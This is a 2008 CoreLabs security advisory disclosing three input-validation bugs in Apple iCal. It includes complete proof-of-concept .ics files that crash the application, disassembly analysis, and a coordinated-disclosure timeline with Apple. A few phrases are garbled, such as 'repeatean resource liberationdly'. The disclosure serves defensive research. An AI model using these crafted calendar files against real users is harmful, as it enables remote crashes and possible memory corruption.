Core Security Technologies Advisory 2008.0126

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
Core Security Technologies - CoreLabs Advisory  
http://www.coresecurity.com/corelabs/  
  
Multiple vulnerabilities in iCal  
  
  
*Advisory Information*  
  
Title: Multiple vulnerabilities in iCal  
Advisory ID: CORE-2008-0126  
Advisory URL: http://www.coresecurity.com/?action=item&id=2219  
Date published: 2008-05-21  
Date of last update: 2008-05-21  
Vendors contacted: Apple Inc.  
Release mode: Coordinated release  
  
  
*Vulnerability Information*  
  
Class: Input Validation  
Remotely Exploitable: Yes (client-side)  
Locally Exploitable: No  
Bugtraq ID: 28629 28632 28633   
CVE Name: CVE-2008-1035 CVE-2008-2006 CVE-2008-2007   
  
  
*Vulnerability Description*  
  
iCal is a personal calendar application from Apple Inc. included on the  
Mac OS X operating system. The calendar application can be used as a  
stand-alone application or as a client-side component to calendar server  
that lets users create and share multiple calendars and subscribe to  
other user's calendars. Apple's iCal uses the iCalendar standard for its  
calendar file format (which uses the '.ics' filename extension) [1] and  
the CalDAV protocol for calendar sharing [2]. There is a growing number  
of web sites providing calendars files and open subscription to calendar  
updates [3][4][5].  
  
Three vulnerabilities discovered in the iCal application may allow  
un-authenticated attackers to execute arbitrary code on vulnerable  
systems with (and potentially without) the assistance from the end user  
of the application or to repeatean resource liberationdly execute a  
denial of service attack to crash the iCal application.  
  
The most serious of the three vulnerabilities is due to potential  
memory corruption resulting from a resource liberation bug that can be  
triggered with a malformed '.ics' calendar file specially crafted by a  
would-be attacker.  
  
The other two vulnerabilities lead to abnormal termination (crash) of  
the iCal application due to null-pointer dereference bugs triggered  
while parsing a malformed '.ics' files. The ability to inject and  
execute arbitrary code on vulnerable systems using these two  
vulnerabilities was researched but not proven possible.  
  
Exploitation of these vulnerabilities in a client-side attack scenario  
is possible with user assistance by opening or clicking on specially  
crafted '.ics' file send over email or hosted on a malicious web server;  
or without direct user assistance if a would-be attacker has the ability  
to legitimately add or modify calendar files on a CalDAV server.  
  
  
*Vulnerable Packages*  
  
. iCal version 3.0.1 on MacOS X 10.5.1 (Leopard).  
  
  
*Non-vulnerable Packages*  
  
. Available through Apple security updates (see vendor information below).  
  
  
*Vendor Information, Solutions and Workarounds*  
  
The following information was provided by the vendor:  
  
Availability  
  
Apple security updates are available via the Software Update mechanism:  
http://support.apple.com/kb/HT1338  
  
Apple security updates are also available for manual download via:  
http://www.apple.com/support/downloads/  
  
Cross-References  
  
If you provide cross-referencing information in your advisory please  
link to the following URL: http://support.apple.com/kb/HT1222  
  
  
*Credits*  
  
These vulnerabilities were discovered and researched by Rodrigo  
Carvalho, from the Core Security Consulting Services (SCS) team of Core  
Security Technologies during Bugweek 2007. Additional research was done  
by Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT).  
  
  
*Technical Description / Proof of Concept Code*  
  
Three vulnerabilities discovered in the iCal application may allow  
un-authenticated attackers to execute arbitrary code on vulnerable  
systems with (and potentially without) the assistance from the end user  
of the application or to repeateadly execute a denial of service attack  
to crash the iCal application.  
  
A client-side attack directed to the end-users of the iCal application  
can be executed by sending an email with a malicious .ics file  
attachment, by hosting a malicious .ics file on web site and directing  
users to open it or by injecting a malicous .ics file on a CalDAV  
enabled server to which potential victims are subscribed to update their  
calendars automatically. In the three reported cases the vulnerabilities  
arise from improper validation of input while or after parsing of the  
calendar file format.  
  
1) Null pointer de-reference #1 (Bugtraq ID 28629, CVE-2008-2006)  
  
Improper sanitization of integer input may lead to null pointer  
dereference and possibly to an application that loses control of its  
execution, resulting in a denial of service.  
  
A vulnerable .ics file will contain the following line:  
  
/-----------  
  
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646  
  
- -----------/  
  
The 'COUNT' value causes an integer overflow, which leads to a null  
pointer dereference when iCal tries to use it after the .ics file is  
imported.  
  
The following Proof of Concept (PoC) file is provided to demonstrate  
its feasibility, to trigger the bug import a .ics file with the  
following content and then select one of the created events.  
  
/-----------  
  
BEGIN:VCALENDAR  
X-WR-TIMEZONE:America/Buenos_Aires  
PRODID:-//Apple Inc.//iCal 3.0//EN  
CALSCALE:GREGORIAN  
X-WR-CALNAME: Vulnerable  
VERSION:2.0  
X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5  
METHOD:PUBLISH  
BEGIN:VTIMEZONE  
TZID:America/Buenos_Aires  
BEGIN:DAYLIGHT  
TZOFFSETFROM:-0300  
TZOFFSETTO:-0300  
DTSTART:19991003T000000  
RDATE:19991003T000000  
TZNAME:ARST  
END:DAYLIGHT  
BEGIN:STANDARD  
TZOFFSETFROM:-0300  
TZOFFSETTO:-0300  
DTSTART:20000303T000000  
RDATE:20000303T000000  
RDATE:20001231T210000  
TZNAME:ART  
END:STANDARD  
END:VTIMEZONE  
BEGIN:VEVENT  
SEQUENCE:4  
DTSTART;TZID=America/Buenos_Aires:20071225T110000  
DURATION:PT1H  
UID:48878014-5F03-43E5-8639-61E708714F9A  
DTSTAMP:20071213T130632Z  
SUMMARY:Vuln  
CREATED:20071213T130611Z  
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646  
END:VEVENT  
END:VCALENDAR  
  
- -----------/  
  
Analysis of the vulnerability  
  
The above proof-of-concept file creates new events in the iCal  
application . When a user double-clicks on these events the program  
crashes writing in the memory pointed by pointer 'EDI=0'. Only the value  
of 'EAX' is under control, must be less than '0x7fffffff' and is  
extracted from the following line of the PoC '.ics' file.  
  
/-----------  
  
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 (0x7FFFFFFE)  
- -----------/  
  
  
  
/-----------  
  
__text:0013C178 push ebp  
__text:0013C179 mov ebp, esp  
__text:0013C17B sub esp, 38h  
__text:0013C17E mov eax, ds:off_1F435C  
__text:0013C183 mov [ebp+var_4], edi  
__text:0013C186 mov edi, [ebp+arg_C]  
__text:0013C189 mov [ebp+var_8], esi  
__text:0013C18C mov esi, [ebp+arg_8]  
__text:0013C18F mov [ebp+var_C], ebx  
__text:0013C192 mov [esp+38h+var_34], eax  
__text:0013C196 mov eax, [ebp+arg_0]  
__text:0013C199 mov [esp+38h+var_28], 0  
__text:0013C1A1 mov [esp+38h+var_2C], 0  
  
- -----------/  
  
Here is written on '[ebp + var28]' and '[ebp + var2C]' and because  
'EBP' is 'ESP' minus '0x38', this is similar to  
  
/-----------  
  
[ebp + var28] = [esp+0x38+var_28]  
[ebp + var2C] = [esp+0x38+var_2C]  
  
- -----------/  
  
There are located the null-pointers on the stack.  
  
/-----------  
  
BFFFEF7C var_2C dd 0  
BFFFEF80 var_28 dd 0  
  
- -----------/  
  
Upon reaching the function where the crash occurs.  
  
/-----------  
  
__text:0014ADC3 push ebp  
__text:0014ADC4 mov ebp, esp  
__text:0014ADC6 sub esp, 48h  
__text:0014ADC9 mov eax, ds:stru_1FA2A0.superclass  
  
- -----------/  
  
Logically the zeros are still present because don't work with those  
values until we enter.  
  
/-----------  
  
BFFFEF7C arg_C dd 0  
BFFFEF80 arg_10 dd 0  
  
- -----------/  
  
We see that the function argument 'arg_C' is loaded and moved to 'EDI'.  
  
/-----------  
  
0014ADE0 mov edi, [ebp+arg_C]  
  
- -----------/  
  
And this is the location where is written at the moment of crashing  
further ahead, meaning that it is a zero that can't be changed.  
  
/-----------  
  
0014AE2F mov dword ptr [edi], 0  
  
- -----------/  
  
When getting closer to the point of crash because we control 'EAX' and  
we can trigger a jump after comparing with '[ebx+0Ch]' and '[ebx+08h]'.  
  
/-----------  
  
0014AE20 cmp eax, [ebx+0Ch] (if it is lower than 1)  
0014AE23 jl short loc_14AE2F  
  
0014AE25 cmp eax, [ebx+8] (if it is lower than 0x270F)  
0014AE2D jle short loc_14AE37  
  
  
169280B8 dd 270Fh (ebx+08)  
169280BC dd 1 (ebx+0C)  
  
- -----------/  
  
The first comparison for 'JL' doesn't avoid the crash zone, but anyway  
negative numbers can't be inserted by default and a zero value does not  
crash the program or even gets it near the critical zone. Any other  
value crashes the application when writing in the null location.  
  
In the other case a comparison is made such that if 'EAX' is less than  
'0x270f' the crash zone is avoided and the program continues to work  
without problem. Negative values are not read and if a value greater  
than '0x7fffffff' the maximum value is used instead.  
  
2) Null pointer dereference #2 (Bugtraq ID 28632, CVE-2008-2006)  
  
A vulnerable .ics file will contain the following line:  
  
/-----------  
  
TRIGGER:-PT65535H  
  
- -----------/  
  
The 'TRIGGER' value causes a null pointer dereference when iCal tries  
to use it after the .ics file is imported.  
  
The corresponding PoC follows. to trigger the bug import a .ics file  
with the following content then click on the 65535 on edit mode and  
accept it without changes.  
  
/-----------  
  
BEGIN:VCALENDAR  
X-WR-CALNAME:Fake event  
PRODID:-//Apple Inc.//iCal 3.0//EN  
CALSCALE:GREGORIAN  
VERSION:2.0  
METHOD:PUBLISH  
BEGIN:VTIMEZONE  
TZID:America/Buenos_Aires  
BEGIN:DAYLIGHT  
TZOFFSETFROM:-0300  
TZOFFSETTO:-0300  
DTSTART:19991003T000000  
RDATE:19991003T000000  
TZNAME:ARST  
END:DAYLIGHT  
BEGIN:STANDARD  
TZOFFSETFROM:-0300  
TZOFFSETTO:-0300  
DTSTART:20000303T000000  
RDATE:20000303T000000  
RDATE:20001231T210000  
TZNAME:ART  
END:STANDARD  
END:VTIMEZONE  
BEGIN:VEVENT  
SEQUENCE:10  
DTSTART;TZID=America/Buenos_Aires:20071225T000000  
DTSTAMP:20071213T124414Z  
SUMMARY:Fake Event  
DTEND;TZID=America/Buenos_Aires:20071225T010000  
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1  
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9  
TRANSP:OPAQUE  
CREATED:20071213T124215Z  
BEGIN:VALARM  
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49  
ACTION:DISPLAY  
DESCRIPTION:Event reminder  
TRIGGER:-PT65535H  
END:VALARM  
END:VEVENT  
END:VCALENDAR  
  
- -----------/  
  
3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-2007)  
  
This is another case of bad validation of a file with the iCalendar  
format that results in a more serious bug.  
  
A vulnerable .ics file will contain the following line:  
  
/-----------  
  
ATTACH;VALUE=URI:S=osumi  
  
- -----------/  
  
The corresponding PoC follows. Double-click on the .ics file with the  
following content, an event will be created. To crash iCal click on the  
newly created event and the on the alarm sound list.  
  
/-----------  
  
BEGIN:VCALENDAR  
X-WR-TIMEZONE:America/Buenos_Aires  
PRODID:-//Apple Inc.//iCal 3.0//EN  
CALSCALE:GREGORIAN  
X-WR-CALNAME:evento falso  
VERSION:2.0  
X-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990  
METHOD:PUBLISH  
BEGIN:VTIMEZONE  
TZID:America/Buenos_Aires  
BEGIN:DAYLIGHT  
TZOFFSETFROM:-0300  
TZOFFSETTO:-0300  
DTSTART:19991003T000000  
RDATE:19991003T000000  
TZNAME:ARST  
END:DAYLIGHT  
BEGIN:STANDARD  
TZOFFSETFROM:-0300  
TZOFFSETTO:-0300  
DTSTART:20000303T000000  
RDATE:20000303T000000  
RDATE:20001231T210000  
TZNAME:ART  
END:STANDARD  
END:VTIMEZONE  
BEGIN:VEVENT  
SEQUENCE:11  
DTSTART;TZID=America/Buenos_Aires:20071225T000000  
DTSTAMP:20071213T143420Z  
SUMMARY:evento falso  
DTEND;TZID=America/Buenos_Aires:20071225T010000  
LOCATION:donde se hace  
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1  
TRANSP:OPAQUE  
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9  
URL;VALUE=URI:http://pepe.com:443/pepe  
ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2  
0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php  
  
CREATED:20071213T142720Z  
CREATED:20071213T124215Z  
BEGIN:VALARM  
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49  
ACTION:DISPLAY  
DESCRIPTION:Event reminder  
TRIGGER:-PT15H  
END:VALARM  
BEGIN:VALARM  
X-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0  
ACTION:AUDIO  
TRIGGER:-PT15M  
ATTACH;VALUE=URI:S=osumi  
END:VALARM  
END:VEVENT  
END:VCALENDAR  
  
- -----------/  
  
  
  
  
*Report Timeline*  
  
. 2008-01-30:  
Core sends an initial notification that vulnerabilities were  
discovered in the iCal application and iCal server and that an advisory  
draft is available.  
  
. 2008-01-31:  
Vendor acknowledges and requests the draft.  
  
. 2008-01-31:  
Core sends the draft, including proof-of-concept files that trigger  
the bugs.  
  
. 2008-02-12:  
Core requests update info on the vulnerabilities and states that  
wants to coordinate the date of the disclosure.  
  
. 2008-02-18:  
Core requests update info on the vulnerabilities.  
  
. 2008-02-18:  
Vendor replies that the iCal Server (CVE-2008-1000) vulnerability is  
tracked for a fix in an upcoming update and the vulnerabilities in the  
iCal client application will be fixed in an update following the early  
March software update.  
  
. 2008-02-19:  
Core indicated that it will split the report in two security advisories.  
CORE-2008-0123 will address the vulnerability in iCal server  
(CVE-2008-1000) and will be published in coordination with the release  
of the vendor's March software update. The publication date for the  
second advisory, will dealt bydealing with the three vulnerabilities in  
the iCal client application will be coordinated for a date after the  
March update unless there are clear indications of the vulnerability  
being exploited in the wild, in which case if Core considers that the  
information provided in the advisory would help end users to decide how  
to react the advisory would be published sooner as a "forced release".  
  
. 2008-03-03:  
Core requests update info on the vulnerability, a concrete release  
schedule and text for the advisory section called "Vendor Information,  
Solutions and Workarounds".  
  
. 2008-03-04:  
Vendor provides information concerning CVE-2008-1000 and indicates  
that the bug is in the Wiki server and not the iCal Server.  
  
. 2008-03-13:  
Core re-schedules the publication to March 24th and requests the vendor  
an update on the coordinated date of disclosure. The remaining three  
vulnerabilities in the iCal client application will be dealt by a second  
security advisory (CORE-2008-0126) to be published after the release of  
the March software update. Publication of CORE-2008-0126 is initially  
slated for March 24th 2008 but the final date estimation can be  
discussed further with the vendor based on its estimated date for fixes.  
  
. 2008-03-18:  
APPLE-SA-2008-0318 software update released.  
  
. 2008-03-18:  
CORE-2008-0123 is published.  
  
. 2008-03-18:  
Vendor informs that will track the first two issues as crasher-only  
bugs but still intends to address them. Further details to determine if  
the null pointer de-reference bugs are exploitable are requested. The  
vendor will continue to track the third as a security bug and estimates  
early April for the release of the software update that fix them.  
Additional timing information will be provided closer to the estimated date.  
  
. 2008-03-18:  
Core re-schedules the publication to April 7th and indicates that  
should any new details about the vulnerabilities become available they  
will be forwarded to the vendor.  
  
. 2008-04-04:  
Core requests a more precise date of release of the fixes to coordinate  
the publication and recommends the vendor to consider the three as  
security bugs because it couldn't be proved that in this case the  
integer overflows can't be exploited.  
  
. 2008-04-07:  
Vendor requests that Core to postpone the advisory publication until  
the fix is available.  
  
. 2008-04-07:  
Core requests a more precise date of release of the fixes to coordinate  
the new publication date.  
  
. 2008-04-07:  
Vendor informs that the estimated date for the update is near the end  
of April.  
  
. 2008-04-08:  
Core confirms that coordinating the publication of CORE-2008-0126 for  
April 28th is acceptable.  
  
. 2008-04-16:  
Core requests an update on the release date of the fixes.  
  
. 2008-04-17: Vendor states that end of April is still the estimated  
date and provides more details that explain why the first two bugs are  
been considered null-pointer dereference bugs only. A value range  
verification is performed and out-of-range values branch execution flow  
to instructions that assign NULL to a pointer which later triggers a  
null pointer de-reference that causes the application to crash. the root  
cause of the crash is a NULL pointer de-reference and not an integer  
overflow.  
  
. 2008-04-17:  
Core confirms that the two first bugs can be considered crashes due to  
null-pointer dereference. Upon further research it is confirmed that  
integer overflows are detected and do not cause the actual crashes.  
  
. 2008-04-17:  
Vendor asks confirmation that the first two bugs have no security  
related consequences.  
  
. 2008-04-17:  
Core responds that the three bugs still have security related  
consequences. The first two bugs can be abuse to execute denial of  
service attacks by untrusted and unauthenticated third parties  
specifically using public server as attack vector. Core considers bug  
that allow unauthenticated third parties to be security vulnerabilities.  
Core indicates that exploitation of null pointer de-reference bugs  
cannot be ruled out generically, a statement which could be derived from  
Rice's theorem.  
  
. 2008-04-25: Core requests an update on the release date of the fixes  
and sends detailed information on the analysis of the first bug.  
. 2008-04-27: Vendor estimates early May as the date of the software  
fixes release.  
. 2008-05-05: Core informs the vendor that it's re-scheduling the  
publication to May 12th as a final date unless precise information is  
given on the release date of the fixes.  
. 2008-05-06: Vendor responds precising that the fixes are being  
released sometime the following week.  
. 2008-05-07: Core states that it is not willing to re-schedule  
publication date unless the vendor commits to a concrete date.  
. 2008-05-10: Vendor asks Core not to publish the advisory before Apple  
security update is available. Vendor indicates that fixes will be  
released on May 19th, 2008.  
. 2008-05-10: Given that the vendor has communicated a concrete date,  
Core will discuss re-scheduling (for the fifth time) the publication  
date of the advisory.  
. 2008-05-12: Core communicates the vendor that the publication of the  
advisory is re-scheduled to May 21th, that date is final.  
  
. 2008-05-14: Vendor acknowledges reception of the last email and  
appreciates that Core posponed the advisory publication date.  
  
. 2008-05-20: Core send the final draft of the advisory to the vendor.  
  
. 2008-05-21:  
An edited and corrected final version of the advisory is sent to the  
vendor.  
  
. 2008-05-21: Advisory CORE-2008-0126 is published.  
  
  
  
*References*  
  
[1]  
RFC 2445: Internet Calendaring and Scheduling Core Object  
Specification (iCalendar) - http://tools.ietf.org/html/rfc2445  
[2] RFC 4791: Calendaring Extensions to WebDAV -  
http://tools.ietf.org/html/rfc4791  
[3] http://www.apple.com/downloads/macosx/calendars/  
[4] iCalShare http://icalshare.com/  
[5] iCalWorld http://www.icalworld.com/  
  
  
*About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct our research in several important  
areas of computer security including system vulnerabilities, cyber  
attack planning and simulation, source code auditing, and cryptography.  
Our results include problem formalization, identification of  
vulnerabilities, novel solutions and prototypes for new technologies.  
CoreLabs regularly publishes security advisories, technical papers,  
project information and shared software tools for public use at:  
http://www.coresecurity.com/corelabs/.  
  
  
*About Core Security Technologies*  
  
Core Security Technologies develops strategic solutions that help  
security-conscious organizations worldwide develop and maintain a  
proactive process for securing their networks. The company's flagship  
product, CORE IMPACT, is the most comprehensive product for performing  
enterprise security assurance testing. CORE IMPACT evaluates network,  
endpoint and end-user vulnerabilities and identifies what resources are  
exposed. It enables organizations to determine if current security  
investments are detecting and preventing attacks. Core Security  
Technologies augments its leading technology solution with world-class  
security consulting services, including penetration testing and software  
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core  
Security Technologies can be reached at 617-399-6980 or on the Web at  
http://www.coresecurity.com.  
  
  
*Disclaimer*  
  
The contents of this advisory are copyright (c) 2008 Core Security  
Technologies and (c) 2008 CoreLabs, and may be distributed freely  
provided that no fee is charged for this distribution and proper credit  
is given.  
  
  
*GPG/PGP Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.6 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org  
  
iD8DBQFINH0iyNibggitWa0RAtdmAKCf4V+tks7RBYRRa2Bp9IT3LjBoQgCfeff8  
PZO21gkXaFO1pAdxuViw2ys=  
=xZCy  
-----END PGP SIGNATURE-----  
`